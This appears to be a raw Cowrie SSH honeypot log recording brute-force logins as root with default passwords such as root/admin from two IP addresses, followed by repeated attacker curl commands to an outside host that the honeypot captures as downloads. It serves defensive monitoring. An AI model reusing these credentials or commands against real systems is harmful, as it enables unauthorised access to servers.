{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:39:00.594219Z","src_ip":"210.79.190.151","session":"8f7a817075eb"}
{"eventid":"cowrie.session.connect","src_ip":"210.79.190.151","src_port":54370,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4ab8c186f7e","protocol":"ssh","message":"New connection: 210.79.190.151:54370 (1.2.3.4:22) [session: d4ab8c186f7e]","sensor":"my-vps","timestamp":"2025-08-28T07:39:00.859824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:39:00.860819Z","src_ip":"210.79.190.151","session":"d4ab8c186f7e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:39:01.128875Z","src_ip":"210.79.190.151","session":"d4ab8c186f7e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:39:02.239875Z","src_ip":"210.79.190.151","session":"d4ab8c186f7e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:39:03.508690Z","src_ip":"210.79.190.151","session":"d4ab8c186f7e"}
{"eventid":"cowrie.session.connect","src_ip":"210.79.190.151","src_port":54374,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee142734f5e1","protocol":"ssh","message":"New connection: 210.79.190.151:54374 (1.2.3.4:22) [session: ee142734f5e1]","sensor":"my-vps","timestamp":"2025-08-28T07:39:03.782768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:39:03.783590Z","src_ip":"210.79.190.151","session":"ee142734f5e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:39:04.059376Z","src_ip":"210.79.190.151","session":"ee142734f5e1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:39:05.204390Z","src_ip":"210.79.190.151","session":"ee142734f5e1"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:39:05.480330Z","src_ip":"210.79.190.151","session":"ee142734f5e1"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:39:05.481285Z","src_ip":"210.79.190.151","session":"8f7a817075eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53820,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b47a9222cbe","protocol":"ssh","message":"New connection: 212.227.125.160:53820 (1.2.3.4:22) [session: 7b47a9222cbe]","sensor":"my-vps","timestamp":"2025-08-28T07:39:30.399976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.8","message":"Remote SSH version: SSH-2.0-libssh_0.9.8","sensor":"my-vps","timestamp":"2025-08-28T07:39:30.400973Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.client.kex","hassh":"3335afa7a75e84f8348f05c623c5ecf9","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 3335afa7a75e84f8348f05c623c5ecf9","sensor":"my-vps","timestamp":"2025-08-28T07:39:30.826770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:39:31.414217Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:32.147143Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.147836Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:32.205190Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.205920Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:32.332660Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.333430Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:32.468486Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.469305Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.474738Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:32.529290Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.530056Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.536155Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.560340Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.591231Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.617309Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:32.702945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.703729Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.765576Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:32.827858Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.828658Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:32.926643Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.034762Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.035469Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.146238Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.146920Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.150807Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.199582Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.200226Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.244481Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.261137Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.291668Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.292335Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.353784Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.362017Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.362616Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.400251Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.400883Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.424258Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.437577Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.438210Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.476264Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.477132Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.518262Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.518952Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.555426Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.556293Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.598449Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.599119Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.635921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.636582Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.672984Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.673591Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.724455Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.727543Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.728304Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.765614Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.766293Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.779613Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.791313Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.803886Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
